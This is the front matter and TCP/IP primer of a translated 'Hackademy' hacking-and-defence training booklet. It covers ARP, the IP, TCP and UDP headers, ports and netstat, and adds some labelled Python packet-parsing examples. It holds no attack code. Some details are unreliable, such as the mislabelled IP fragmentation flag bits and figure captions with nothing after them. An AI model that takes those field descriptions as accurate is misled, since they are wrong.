Hack security “pro”
Important

The aim of the present Hackademy training course booklet is to contribute to a better understanding of the security risks in the use of IT, thus allowing better protection from these risks. It will be of use to network and system administrators, developers and professionals working with the Internet. If you wish to understand how a hacker could try to attack you, and you want to protect yourself from these attacks, this training course is made for you. However, no guarantee is given that the contents of this course will give you total protection; you will nonetheless have all the material you need to develop an efficient security management policy. Furthermore, this course cannot aim to cover all aspects of security exhaustively: we detail common attack methods and give you the means to protect yourself from them. The Hackademy and DMP cannot be held responsible for any damage caused by an implementation of the methods presented here. It is strictly forbidden by law to apply any of the attack methods presented in this training course to any system that you do not own. You can however apply them to computer systems as vulnerability tests, bearing in mind that there are always risks involved for the stability of audited systems.
Warning

It is essential to understand that the methods in this booklet are presented above all to give a general comprehension of security and of the methods used by hackers, with the one and only aim of fighting against this danger. What's more, these protection methods can be used both by companies and individuals. Leaving aside all the private documents stored on your computer, a hacker could use your system as a gateway, to avoid being found. In this case, it would be up to you, as a natural person or as a legal entity, to prove your innocence. In case of hacking, the proper security policy is to entirely reinstall your system, resulting in a loss of both time and money.

The general structure of this document will be as follows:
> Description of the attack or the type of vulnerability.
> Means to implement to avoid becoming a victim.
The Hackademy
DMP
-2/209-
SYSDREAM
Authors

For their contribution to the elaboration of this training course and the writing of this booklet, we would like to thank:
Chapter I: Information Acquisition ..... 21
  Public Information Acquisition ..... 22
  Network Mapping ..... 26
  Zone Transfer ..... 27
  Fingerprinting the System ..... 29
  Port Scanning ..... 29
  Listing of Services ..... 31
  Netbios Listing ..... 36
  Applicative Fingerprinting ..... 38
  Listing of Firewalling Rules ..... 38

Chapter VI: Systems Vulnerabilities ..... 166
  Brute Force Authentication ..... 167
  System Spying ..... 176
  Backdoors and Rootkits ..... 178

Chapter VII: Generic Security Procedures ..... 181
  Intrusion Detection Systems ..... 182
  Monitoring with Windows ..... 184
  Anti Portscan ..... 185
  Cryptography ..... 186
  System Integrity ..... 196
  Firewalling ..... 198
  VPN ..... 205
INTRODUCTION
INTRODUCTION TO TCP/IP NETWORKS

Networks Notions

The material

Any communication needs a medium. This also applies to IT, so it was necessary to create interfaces capable of translating the binary language of a digital system into a signal appropriate for a medium (copper pair cable, coaxial cable, fiber optics, etc.). These interfaces have electronic circuits that allow them to listen and transmit on a medium. Each adaptor also has a small quantity of memory that is accessible by the host system (PC, etc.). The first phase of development was to create these adaptors, and to deliver, for later developments, precise documentation on the registers and addresses used to operate the communication functions. These operations make up the first layer of the OSI reference model: the physical layer. It allows communication between a (digital) system and an (analog) transmission medium (airwaves, laser, copper, fiber optics, etc.). The most common cards are Ethernet 802.3 cards (RJ45, BNC, AUI); they support throughputs of 10 Mb/s or 100 Mb/s. They translate digital data (e.g. 0011 0100) into voltages appropriate for the medium (amplitude, coding, etc.). Network adaptors also monitor the medium's condition, and can detect a certain number of errors on it. This part is transparent to developers; it is however ensured by each NIC (Network Interface Card). Every Ethernet card has a unique physical address. This address, also called a MAC (Media Access Control) address, is used for dialogues between two cards. It is coded on 6 bytes, the first 3 identifying the manufacturer (e.g. 00:0a:24 is the manufacturer 3COM). MAC addresses (see the MAC address format figure) are generally shown in hexadecimal form, each byte being separated by the ':' symbol (e.g. 00:40:05:61:71:EC).
Transmissions security (reliability)

The network layer therefore links a destination to the network (either directly or indirectly, hence the routing functions); it also takes care of basic service management operations. ICMP packets can be exchanged between routers or stations to indicate an event on the network (loss of packet, filtering, oversized packet requiring IP fragmentation, etc.). It is however necessary to have a software part capable of ensuring the proper emission and reception of data. When a packet (or datagram) does not reach its destination, without software intervention the packet has simply not arrived, and will never be automatically transmitted again. Two protocols can fill this void: UDP (User Datagram Protocol) and TCP (Transmission Control Protocol). UDP does not control packet losses: each packet is transmitted to the destination without being numbered, and without acknowledgement. The TCP protocol ensures a more reliable transfer of data, by opening a communication session before any dialogue, then numbering packets for reconstruction, re-transmitting lost or corrupted packets, and so on.
So the TCP and UDP protocols are the transport layer in the IP stack; they are the ones that ensure data transmission from one point of the network to the other, by handling (or not handling) the necessary retransmission of lost or altered packets, etc.

Networks communications: the OSI and TCP/IP models

Communications between systems are possible only if each system understands its destination (a Frenchman doesn't necessarily speak Spanish and vice versa). It was therefore necessary to devise a norm to allow everyone to communicate using an existing network. That is why TCP/IP is called an open network. The protocols used are standardized and available to the whole world. Anyone can thus adapt his proprietary system to communicate in TCP/IP, by writing the various software components according to TCP/IP standards (the majority of operating systems now have a TCP/IP implementation). The Open Systems Interconnection reference model (OSI-RM) has been standardised with 7 distinct layers. TCP/IP fits into this model, but does not systematically use all 7 layers. Each layer's role is to let the upper layer pass it the data to be transmitted, and to pass data received from the lower layer up to the upper layer. We can therefore see that a single communication between two systems involves several protocols.

Encapsulation

Only the upper layer (Application) contains data, and this is only the data that is to be transmitted or received. Each layer adds its own header, encapsulating data packets into bigger packets on transmission, or strips its header on reception. When a data packet needs to be transmitted by an application, this data will receive several headers according to the protocols used.
In case of reception, each layer will take the information it needs and then remove its header before sending the remaining data block to the next layer above.

Links

In certain cases, an extra layer is necessary. In the case of access via a modem (over a serial link), there is no hardware address (MAC address) on a modem. Since this address is needed by the physical and network layers, in theory no communication is possible. A modem is not a network interface but a serial one (communication is done through a COM port); it has no standard hardware address, nor does it have any ROM providing an IP communication interface. An extra software layer is thus necessary, in order to simulate and provide an alternative to the use of a MAC address. In the case of a TCP/IP link over a modem, the PPP protocol (Point to Point Protocol) will generally be used; it sits between the network layer and the physical layer. This protocol provides a software solution for IP communications that would otherwise need a MAC address.

Layers and protocols used

Each layer of the IP stack uses one or several protocols to fulfil certain functions (the transport layer uses TCP or UDP). With this method, layers can standardize incoming and outgoing data flows. Each layer (and thus each implementation) is therefore independent of the upper and lower layers.
• A protocol is a dialogue known by the two parties, between two layers of the same level. A layer of any level (l) will only be capable of dialogue with another layer of the same level.
• A service is the set of functions that the layer must absolutely fulfil; it provides the interface to transmit data from the (l) layer to the (l+1) or (l-1) layer.
Address Resolution Protocol (ARP)

During a dialogue between two stations, each network adaptor must be able to take in the data sent to it, without processing data that is of no concern to it (saving CPU and network time). Some networks function as a bus (non-switched Ethernet, coaxial links, etc.) where all data transits on the shared medium, so every network adaptor must analyse the packets and take into account only the ones directed to it. The only addresses available and usable at the level of the physical interface (layer 1 of the TCP/IP model) are MAC addresses. Without these addresses, each adaptor would have to decode each packet up to level 3 (IP) to know whether the data is directed to it or not. In the case of a dialogue between two stations 10.23.23.2 and 10.23.23.254, the first step consists of finding the hardware address of the destination station, so as to send the data to this station (specifying its hardware address rather than its IP one). That is when the ARP protocol is used (level 3, network layer). This protocol enables a station to find the hardware address of another station. To do so, if 10.23.23.2 wishes to contact 10.23.23.254, before any dialogue the station broadcasts an ARP request to all stations of the network. Each station then receives this ARP request, in the form of the following message: station 10.23.23.2 with hardware address xx:xx:xx:xx:xx:xx is looking for the hardware address of 10.23.23.254. All stations linked to this segment then analyse this request, but only station 10.23.23.254 answers it, by sending the following message: station 10.23.23.254 has yy:yy:yy:yy:yy:yy as its hardware address.

Stations 10.23.23.2 and 10.23.23.254 then store the pair of addresses (IP address and MAC address) obtained in a cache (called the ARP cache, see the example ARP table figure), so that they won't have to ask the question again for a new communication within a short delay (a few minutes, after which the ARP cache erases the pair of addresses if it is no longer used).
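The request/reply exchange and the ARP cache described above, as an added Python example (not code from the booklet): it encodes and decodes the 28-byte Ethernet/IPv4 ARP packet and simulates a segment of stations, each with its own expiring cache. The station addresses and MACs are constructed sample values; `Station`, `resolve` and the 120-second cache lifetime are this example's own assumptions.

```python
import struct
import time

# Ethernet/IPv4 ARP packet (RFC 826): a fixed 28-byte header holding the hardware
# and protocol types, address lengths, operation, then sender MAC/IP and target MAC/IP.
ARP_FMT = "!HHBBH6s4s6s4s"
ARP_LEN = struct.calcsize(ARP_FMT)  # 28
HTYPE_ETHERNET, PTYPE_IPV4 = 1, 0x0800
OP_REQUEST, OP_REPLY = 1, 2
ZERO_MAC = "00:00:00:00:00:00"      # target MAC of a request: not known yet

def mac_to_bytes(mac):
    return bytes(int(part, 16) for part in mac.split(":"))

def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def ip_to_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))

def bytes_to_ip(raw):
    return ".".join(str(b) for b in raw)

def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Encode one ARP request or reply."""
    return struct.pack(ARP_FMT, HTYPE_ETHERNET, PTYPE_IPV4, 6, 4, op,
                       mac_to_bytes(sender_mac), ip_to_bytes(sender_ip),
                       mac_to_bytes(target_mac), ip_to_bytes(target_ip))

def parse_arp(packet):
    """Decode an ARP packet, rejecting anything but Ethernet/IPv4 ARP."""
    if len(packet) < ARP_LEN:
        raise ValueError("ARP packet too short")
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        ARP_FMT, packet[:ARP_LEN])
    if (htype, ptype, hlen, plen) != (HTYPE_ETHERNET, PTYPE_IPV4, 6, 4):
        raise ValueError("not an Ethernet/IPv4 ARP packet")
    if op not in (OP_REQUEST, OP_REPLY):
        raise ValueError(f"unknown ARP operation {op}")
    return {"op": op,
            "sender_mac": bytes_to_mac(sha), "sender_ip": bytes_to_ip(spa),
            "target_mac": bytes_to_mac(tha), "target_ip": bytes_to_ip(tpa)}

class Station:
    """One host on the segment, with its own ARP cache: IP -> (MAC, expiry)."""

    def __init__(self, ip, mac, cache_ttl=120.0):   # "a few minutes": assumed value
        self.ip, self.mac, self.cache_ttl = ip, mac, cache_ttl
        self.cache = {}

    def learn(self, ip, mac, now):
        self.cache[ip] = (mac, now + self.cache_ttl)

    def lookup(self, ip, now=None):
        """Cached MAC for ip, or None when unknown or no longer fresh."""
        now = time.monotonic() if now is None else now
        entry = self.cache.get(ip)
        if entry is None:
            return None
        mac, expiry = entry
        if now >= expiry:           # unused for too long: the pair is erased
            del self.cache[ip]
            return None
        return mac

    def handle(self, packet, now=None):
        """Process one received ARP packet; return a reply to send, or None."""
        now = time.monotonic() if now is None else now
        pkt = parse_arp(packet)
        if pkt["target_ip"] != self.ip:
            return None             # not about this station: ignored
        # the sender's (IP, MAC) pair is learnt from requests and replies alike
        self.learn(pkt["sender_ip"], pkt["sender_mac"], now)
        if pkt["op"] == OP_REQUEST:
            return build_arp(OP_REPLY, self.mac, self.ip,
                             pkt["sender_mac"], pkt["sender_ip"])
        return None

def resolve(client, segment, target_ip, now=None):
    """MAC of target_ip as seen from client: the cache first, else a broadcast.

    Returns (mac, broadcast_sent). segment lists the other stations, which
    all receive the broadcast; only the owner of target_ip answers it."""
    now = time.monotonic() if now is None else now
    mac = client.lookup(target_ip, now)
    if mac is not None:
        return mac, False
    request = build_arp(OP_REQUEST, client.mac, client.ip, ZERO_MAC, target_ip)
    for station in segment:
        reply = station.handle(request, now)
        if reply is not None:
            client.handle(reply, now)
    return client.lookup(target_ip, now), True
```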
ARP header:
The ARP cache can be consulted with a shell:
Internet protocol (IP)

On an Ethernet segment, it is not necessary to use a hardware or software layer to fulfil the link functions. Level 2 protocols are used only on serial or parallel links, or on any other interface or equipment without a MAC address (e.g. PPP or SLIP for IP access via a modem). Each packet circulating on the network has several headers, because of successive encapsulations. A data packet thus has at least one header linked to the medium used (usually Ethernet). This is the case for ARP. Packets using IP addresses will also carry IP header information. The contents of this fixed 20-byte header (this is a minimum; it can be more if IP options are used) give information on the sending station (IP address), the destination's address, the checksum, the protocol, the version, etc. There are 3 types of IP addresses:
• Unicast for one particular station
• Broadcast for all stations
• Multicast for a (pre-defined) Multicast group
IP header
Version: 4 bits. The version field gives the Internet header format. The present document describes the protocol's version 4 format.

Header length: 4 bits. The header length field gives the length of the Internet header in 32-bit words, and thus indicates where the data starts. Please note that this field cannot have a value under 5 in order to be valid.

Service type: 8 bits. The Service Type gives an indication of the quality of service requested; however, it remains an “abstract” parameter. It is used to “guide” the choice of actual service parameters when a datagram transits through a specific network. Some networks offer a priority mechanism, whereby a certain type of traffic is treated preferentially over less preferred traffic (generally by agreeing to transfer only packets above a certain level of precedence in case of temporary overloading). The main choice offered is a trade-off between the three following constraints: a short delay, a low rate of error and a high throughput.

Total length: 16 bits. The “Total Length” field is the length of the complete datagram, including header and data, measured in bytes. This field can only encode a datagram length of at most 65,535 bytes. Such a length would anyway make datagrams impossible to handle for the vast majority of networks. Hosts must at least be able to accept datagrams up to a length of 576 bytes (whether a single datagram or a fragment). It is also recommended that hosts do not send datagrams over 576 bytes unless they are sure that the destination is able to accept them.

Identification: 16 bits. An identification value, allocated by the sender to identify the fragments of a single datagram.

Flags: 3 bits. Various control switches. Bit 0: reserved, must be left at 0. Bit 1: (AF) 0 = fragmentation possible, 1 = do not fragment. Bit 2: (DF) 0 = last fragment, 1 = intermediate fragment (more fragments follow).

Fragment offset: 13 bits. This field indicates the offset of the fragment's first byte within the whole datagram. This relative position is measured in 8-byte (64-bit) blocks. The offset of the first fragment is zero.

Time to live: 8 bits. This field limits the amount of time a datagram stays in the network. If this field is equal to zero, the datagram must be destroyed. This field is modified during the processing of the Internet header. Each Internet module (router) must subtract at least one time unit from this field when forwarding the packet, even if the complete handling of the datagram by the module lasts less than one second. This time to live must thus be seen as the absolute maximum amount of time during which a datagram can exist. This mechanism exists because of the need to destroy any datagram that has not been correctly transmitted on the network.

Protocol: 8 bits. This field indicates which upper level protocol is used in the data section of the Internet datagram. The values allowed for the various protocols are listed in the “Assigned Numbers” RFC [rfc1060].

Header checksum: 16 bits. Checksum calculated only on the header. As certain fields of the header (e.g. the time to live) are modified during transit through the network, this checksum must be recalculated and checked at each network location where the header is re-interpreted.

Address source: 32 bits. The source's Internet address.
Address destination: 32 bits. The destination's Internet address.

Transmission Control Protocol (TCP)

The transport layer (layer number 4 in the IP stack) ensures the proper transfer of data. It is this layer that will, for example, number the TCP packets before sending them on the network, so that the destination can re-assemble the entire data in the right order (this is not the case for UDP). Two protocols are frequently used in a TCP/IP environment: TCP and UDP. TCP numbers the packets, and the destination acknowledges each one. It is therefore necessary for the two parties to establish a dialogue through negotiation. That is the reason why a TCP communication always begins with a synchronization of the two parties. The sender asks the receiver if it is ready to receive data; the latter acknowledges the request, which the sender then validates. The transfer of data can then start. The TCP connection is established with a “Three-Way Handshake”.

Let us for example take a machine “A” and a machine “B”. Machine “A” is the client and machine “B” is the server.
1. A --- SYN ---> B; The client machine sends a TCP packet with the SYN flag set, which means: “Can I establish a connection? (SYN)”
2. A <--- SYN/ACK --- B; The server machine answers with a TCP packet with the SYN and ACK flags set, which means: “Yes, you can establish a connection (ACK), and what about me? Can I establish a connection? (SYN)” It is necessary to send a packet with the SYN flag even in the answer, for a connection is always a two-way one.
3. A --- ACK ---> B; The client machine answers with a TCP packet with the ACK flag set, which means: “Yes, you can establish a connection (ACK)”.
If a machine refuses a connection, it answers the client's SYN with an RST.
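The IPv4 header fields described before the TCP section, as an added Python example (not code from the booklet): it builds and parses the fixed 20-byte header, verifies the header checksum the way a router must, decrements the TTL and recomputes the checksum, and splits a datagram into fragments whose offsets are kept in 8-byte blocks. Addresses and payload are constructed sample values; `build_ipv4`, `parse_ipv4`, `forward` and `fragment` are names chosen here.

```python
import struct

IPV4_FMT = "!BBHHHBBH4s4s"   # the fixed 20-byte header, fields in wire order
FLAG_DF = 0x4000             # flags bit 1: do not fragment
FLAG_MF = 0x2000             # flags bit 2: more fragments follow

def ones_complement_sum(data):
    """16-bit one's complement sum; an odd trailing byte is padded with 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold the carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return total

def checksum(data):
    return (~ones_complement_sum(data)) & 0xFFFF

def ip_to_bytes(ip):
    return bytes(int(o) for o in ip.split("."))

def build_ipv4(src, dst, proto, payload, ttl=64, ident=0,
               df=True, mf=False, offset=0):
    """Encode a datagram without options; offset is in bytes (multiple of 8)."""
    flags_frag = (FLAG_DF if df else 0) | (FLAG_MF if mf else 0) | (offset // 8)
    header = struct.pack(IPV4_FMT, 0x45, 0, 20 + len(payload), ident,
                         flags_frag, ttl, proto, 0,
                         ip_to_bytes(src), ip_to_bytes(dst))
    # the checksum is computed with the checksum field itself at 0
    header = header[:10] + struct.pack("!H", checksum(header)) + header[12:]
    return header + payload

def parse_ipv4(packet):
    """Decode and validate the header; raises ValueError on a bad datagram."""
    if len(packet) < 20:
        raise ValueError("packet shorter than the minimum IP header")
    (ver_ihl, tos, total_len, ident, flags_frag, ttl, proto,
     _cs, src, dst) = struct.unpack(IPV4_FMT, packet[:20])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F
    if version != 4:
        raise ValueError(f"not IPv4 (version {version})")
    if ihl < 5:
        raise ValueError("header length field must be at least 5")
    hlen = ihl * 4
    if total_len < hlen or total_len > len(packet):
        raise ValueError("total length inconsistent with the packet")
    # summing the header with its checksum included must give all ones
    if ones_complement_sum(packet[:hlen]) != 0xFFFF:
        raise ValueError("bad header checksum")
    return {"version": version, "ihl": ihl, "tos": tos,
            "total_length": total_len, "id": ident,
            "df": bool(flags_frag & FLAG_DF), "mf": bool(flags_frag & FLAG_MF),
            "fragment_offset": (flags_frag & 0x1FFF) * 8,   # stored in 8-byte blocks
            "ttl": ttl, "protocol": proto,
            "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
            "options": packet[20:hlen], "payload": packet[hlen:total_len]}

def forward(packet):
    """What each router does: decrement the TTL, destroy at 0, re-checksum."""
    hdr = parse_ipv4(packet)        # a corrupted header is dropped here
    if hdr["ttl"] <= 1:
        return None                 # would reach 0: the datagram is destroyed
    out = bytearray(packet)
    out[8] -= 1                     # TTL
    out[10:12] = b"\x00\x00"        # zero the checksum field, then recompute it
    out[10:12] = struct.pack("!H", checksum(bytes(out[:hdr["ihl"] * 4])))
    return bytes(out)

def fragment(packet, mtu):
    """Split a datagram so each fragment fits in mtu bytes; offsets in 8-byte units."""
    hdr = parse_ipv4(packet)
    if hdr["df"]:
        raise ValueError("DF set: the datagram cannot be fragmented")
    step = (mtu - 20) // 8 * 8      # payload per fragment must be a multiple of 8
    if step <= 0 or hdr["options"]:
        raise ValueError("mtu too small, or options not handled by this example")
    data, frags = hdr["payload"], []
    for pos in range(0, len(data), step):
        last = pos + step >= len(data)
        frags.append(build_ipv4(hdr["src"], hdr["dst"], hdr["protocol"],
                                data[pos:pos + step], ttl=hdr["ttl"],
                                ident=hdr["id"], df=False,
                                mf=hdr["mf"] or not last,
                                offset=hdr["fragment_offset"] + pos))
    return frags
```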
TCP header:
Source Port: 16 bits. The source's port number.

Destination Port: 16 bits. The destination's port number.

Sequence Number: 32 bits. The number of the first data byte of this segment (except if SYN is set). If SYN is set, the sequence number is the Initial Sequence Number (ISN) and the first data byte's number is ISN+1.

Acknowledgment Number: 32 bits. If ACK is set, this field contains the sequence number of the next byte that the receiver expects to receive. Once a connection is established, this field is always filled in.

Data offset: 4 bits. The size of the TCP header in 32-bit words. It indicates where the data starts. In all cases, a TCP header is a whole number of 32-bit words.

Reserved: 6 bits. Reserved for future use. Must be at 0.

Control bits: 6 bits (from left to right):
URG: Urgent pointer field significant
ACK: Acknowledgment field significant
PSH: Push function
RST: Reset the connection
SYN: Synchronize sequence numbers
FIN: End of transmission (no more data from the sender)

Window: 16 bits. The number of data bytes, starting with the one indicated in the ac­knowledgment field, that the sender of this segment is willing to accept.

Checksum: 16 bits. The checksum is the 16-bit one's complement of the one's complement sum of all 16-bit words of the header and data. If the whole message contains an odd number of bytes, a 0 byte is added at the end of the message to finish the calculation of the checksum. This extra byte is not transmitted. While the checksum is calculated, the checksum field itself is set to 0. The checksum also covers a 96-bit pseudo-header prefixed to the TCP header. This pseudo-header contains the source's and the destination's Internet addresses, the protocol type and the length of the TCP message. This protects TCP against misrouted segments. This information is handled by IP, and passed as an argument over the TCP/Network interface when TCP calls IP.

Urgent Pointer: 16 bits. Communicates the position of urgent data as an offset from the sequence number. The pointer designates the byte following the urgent data. This field is interpreted only when URG is set.
Options: variable. The options field, at the end of the TCP header, can vary in size. It is always a multiple of 8 bits. All options are covered by the checksum. An option always begins on a new byte. There are two formats for options: first case: single-byte option. Second case: option type byte, option length byte, option value bytes. The option length counts the type byte, the length byte itself and all value bytes, and is measured in bytes. Please note that the option list can be shorter than the data offset would suggest. In this case padding bytes must be added after the end-of-options code. These bytes must be 0. TCP must implement all options. The options currently defined are (type is indicated in octal):

Option Data:

Maximum segment size: 16 bits. If this option is present, it tells the sender the maximum size of the segments it will be able to send. This field must be sent with the initial connection request (with SYN set). If this option is absent, segments can be of any size.

Padding: variable. Padding bytes end the TCP header: their number is such that the header length is always a multiple of 4 bytes (32 bits), so that the data offset indicated in the header corresponds to the beginning of application data.

User Datagram Protocol (UDP)

UDP is faster and more tolerant, but also less reliable in its transmission technique. Data is transmitted without any guarantee that it reaches the destination. Each packet is transmitted on the network (without being numbered) at the highest possible speed (depending on the station and the medium's state). If any packets are lost, neither the sender nor the destination can detect it; data can also reach the destination out of order, depending on the complexity of the network's topology.

The Source Port is an optional field. When it is of any significance, it indicates the port number of the sending process, and it will be assumed, in the absence of any further information, that any answer must be directed to it. If it is not used, this field keeps a value of 0. The Destination Port has a meaning within the context of a particular Internet destination address. The Length gives the number of bytes in the whole datagram, including this header (consequently, the minimum value of this field is 8 if the datagram carries no data). The Checksum is the 16-bit one's complement of the one's complement sum of a pseudo-header made up of information from the IP header, the UDP header itself and the data, padded with a zero byte at the end if needed to make the total number of bytes even. The pseudo-header added before the UDP header contains the IP source address, the IP destination address, the protocol code and the UDP segment length. This information increases the network's immunity to datagram routing errors. The checksum calculation procedure is the same as for TCP.
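The TCP header, the three-way handshake and the UDP checksum described above, as an added Python example (not code from the booklet): it encodes and decodes TCP segments (flags, data offset, the maximum segment size option with its padding) and UDP datagrams, computing the checksum over the 96-bit pseudo-header so that a segment presented with the wrong addresses is rejected. Port numbers, sequence numbers and addresses are constructed sample values; the function names are this example's own.

```python
import struct

PROTO_TCP, PROTO_UDP = 6, 17
TCP_FMT = "!HHIIBBHHH"        # the fixed 20-byte TCP header
TCP_FLAGS = {"URG": 0x20, "ACK": 0x10, "PSH": 0x08,
             "RST": 0x04, "SYN": 0x02, "FIN": 0x01}
OPT_END, OPT_NOP, OPT_MSS = 0, 1, 2   # option kinds handled here

def ones_complement_sum(data):
    """16-bit one's complement sum; an odd trailing byte is padded with 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def covered(src_ip, dst_ip, proto, segment):
    """The 96-bit pseudo-header (src, dst, zero, protocol, length) + segment."""
    ip = lambda s: bytes(int(o) for o in s.split("."))
    pseudo = struct.pack("!4s4sBBH", ip(src_ip), ip(dst_ip), 0, proto, len(segment))
    return pseudo + segment

def transport_checksum(src_ip, dst_ip, proto, segment):
    """Value to transmit, computed with the checksum field at 0."""
    return (~ones_complement_sum(covered(src_ip, dst_ip, proto, segment))) & 0xFFFF

def checksum_ok(src_ip, dst_ip, proto, segment):
    """With the field filled in, the same sum must come out all ones."""
    return ones_complement_sum(covered(src_ip, dst_ip, proto, segment)) == 0xFFFF

def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags,
              payload=b"", mss=None, window=8192):
    """Encode a segment; mss adds the maximum segment size option (kind 2)."""
    options = struct.pack("!BBH", OPT_MSS, 4, mss) if mss is not None else b""
    options += b"\x00" * (-len(options) % 4)       # pad to whole 32-bit words
    bits = 0
    for name in flags:
        bits |= TCP_FLAGS[name]
    header = struct.pack(TCP_FMT, sport, dport, seq, ack,
                         ((20 + len(options)) // 4) << 4, bits, window, 0, 0)
    segment = header + options + payload
    cs = transport_checksum(src_ip, dst_ip, PROTO_TCP, segment)
    return segment[:16] + struct.pack("!H", cs) + segment[18:]

def parse_tcp(src_ip, dst_ip, segment):
    """Decode a segment carried between src_ip and dst_ip; raises on a bad one."""
    if len(segment) < 20:
        raise ValueError("segment shorter than the minimum TCP header")
    sport, dport, seq, ack, off, bits, window, _cs, urg = struct.unpack(
        TCP_FMT, segment[:20])
    hlen = (off >> 4) * 4
    if hlen < 20 or hlen > len(segment):
        raise ValueError("bad data offset")
    if not checksum_ok(src_ip, dst_ip, PROTO_TCP, segment):
        raise ValueError("bad TCP checksum (corrupted or misrouted segment)")
    mss, opts, i = None, segment[20:hlen], 0
    while i < len(opts):
        kind = opts[i]
        if kind == OPT_END:
            break
        if kind == OPT_NOP:                  # single-byte option
            i += 1
            continue
        if i + 1 >= len(opts) or opts[i + 1] < 2 or i + opts[i + 1] > len(opts):
            raise ValueError("malformed TCP option")
        if kind == OPT_MSS and opts[i + 1] == 4:
            mss = int.from_bytes(opts[i + 2:i + 4], "big")
        i += opts[i + 1]
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": {n for n, b in TCP_FLAGS.items() if bits & b},
            "window": window, "urgent": urg, "mss": mss,
            "payload": segment[hlen:]}

def build_udp(src_ip, dst_ip, sport, dport, payload):
    length = 8 + len(payload)
    datagram = struct.pack("!HHHH", sport, dport, length, 0) + payload
    # a computed 0 is sent as 0xFFFF, since 0 on the wire means "no checksum"
    cs = transport_checksum(src_ip, dst_ip, PROTO_UDP, datagram) or 0xFFFF
    return datagram[:6] + struct.pack("!H", cs) + datagram[8:]

def parse_udp(src_ip, dst_ip, datagram):
    sport, dport, length, cs = struct.unpack("!HHHH", datagram[:8])
    if length < 8 or length > len(datagram):
        raise ValueError("bad UDP length")
    if cs and not checksum_ok(src_ip, dst_ip, PROTO_UDP, datagram[:length]):
        raise ValueError("bad UDP checksum")
    return {"sport": sport, "dport": dport, "payload": datagram[8:length]}

def handshake(client_ip, server_ip, cport, sport, isn_c, isn_s):
    """The three segments of the A/B three-way handshake: SYN, SYN/ACK, ACK."""
    syn = build_tcp(client_ip, server_ip, cport, sport, isn_c, 0, ["SYN"], mss=1460)
    syn_ack = build_tcp(server_ip, client_ip, sport, cport, isn_s, isn_c + 1,
                        ["SYN", "ACK"], mss=1460)
    ack = build_tcp(client_ip, server_ip, cport, sport, isn_c + 1, isn_s + 1, ["ACK"])
    return syn, syn_ack, ack
```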
TCP/UDP Port Notions: Multiplexing/Demultiplexing

A station can simultaneously transmit and receive several TCP and UDP data flows. For this to happen, each endpoint (and these can be different for each established communication) must be associated with a packet arriving on an interface. To do this, the TCP and UDP protocols use port numbers. These numbers are COMPULSORY in any TCP or UDP communication, and associate a communication with a process. All data transiting on the network therefore carries two port numbers: the first on the transmitting side, the second on the destination side. Every communication thus has two pairs of numbers (IP address, port used), one per endpoint. TCP and UDP ports are totally independent. It is therefore possible to have simultaneous communications on port 25/TCP and port 25/UDP. This technique corresponds to multiplexing/demultiplexing. By decoding the port number in the packet, data is sent to one or the other process of the system. Systems conventionally implement the following rules:
• Port numbers under 1024 can only be used by the super-user,
• A client application using TCP or UDP will use a port number above 1024 (even if the user is the super-user). There are however some deliberate exceptions, such as r-services...

A communication implies that a port be open on the client machine and that another port be open on the server machine. These ports are not necessarily the same.
1. A server application opens a port permanently to wait for connection requests.
2. A client application opens ports as needed. It does not wait for connection requests, it does not have the role of a server application and therefore it is not a point of entry into a system.
3. There are 65,535 ports; no more, no less. Most of these are reserved for specific services (FTP: 21, telnet: 23, SMTP: 25, etc.)
4. A closed port is like a wall made of reinforced concrete: nothing enters, nothing exits.

Examples
1. When A sends B a TCP packet with the SYN flag set, and the requested port is closed, machine B sends back a TCP packet with the RST flag set. Some firewalls do not send back a TCP packet with the RST flag set (such as ZoneAlarm).
2. When A wants to connect to B's HTTP server, its client application (Internet Explorer) will open a port (1106, for example). The client application will send a packet made up of IP, TCP and HTTP headers to port 80 of machine B.
Here are some of the commonly used TCP ports according to their services:

PORTS   PROTO   SERVICES
21      TCP     FTP
22      TCP     SSH
23      TCP     TELNET
25      TCP     SMTP
53      UDP     DNS
79      TCP     FINGER
80      TCP     HTTP
110     TCP     POP3
111     TCP     PORTMAPPER
119     TCP     NNTP
139     TCP     NETBIOS
143     TCP     IMAP
443     TCP     HTTPS
445     TCP     MICROSOFT-DS
2049    UDP     NFS
If data packets were transmitted in a totally disorganised manner, without any rules guiding their transmission and construction, systems would not be able to understand each other globally. The system of a company A would understand another company A system, but not that of a company Q. For systems to be able to understand the data they send to each other, there has to be a standard for the way this data is constructed and sent. This standardization is achieved through the development of “protocols”: each packet is made of headers specific to a protocol. On the Internet, the most common protocol is TCP (Transmission Control Protocol). When you go to a website, for example http://www.dmpfrance.com, the IP (Internet Protocol), TCP and HTTP (Hyper Text Transfer Protocol) protocols are used to construct and send data packets.
• IP is used to define everything concerning the addressing of data;
• TCP defines the type of packet sent;
• HTTP carries the data specific to it, i.e. web pages.

IP is used in the addressing of packets, thus allowing the transmitting and receiving relay machines to establish a correct path for data transmission. TCP defines the type of packet, i.e. a packet that can be used to establish a connection, close it, etc. These two protocols are definitely the most important on the Internet at a global level.

Using the Netstat command

The “netstat” command is an instructive one, although it is not always easy to read. It shows the protocol statistics and the TCP/IP network connections in use on the local machine.
Start the MS-DOS command interpreter and run netstat:
The first column shows the protocol used in the communication. The second one shows your machine's address, or its name; after the colon comes the number of the port used in the communication. The third column shows the address of the destination machine; after the colon comes the number of the port used in the communication. The last column shows the state of the communication: whether it is established, being established, ending, etc. Note: if a server application such as a Trojan occupies a port, and an intruder is connected to the Trojan, you will be able to see it thanks to netstat!

IP addressing

Any system wishing to communicate on the global IP network (Internet) must have an IP address. These addresses, given by regulation bodies, are registered and standardized. An Internet station can only be located (reached) by its unique pair of addresses (IP address, subnet mask).

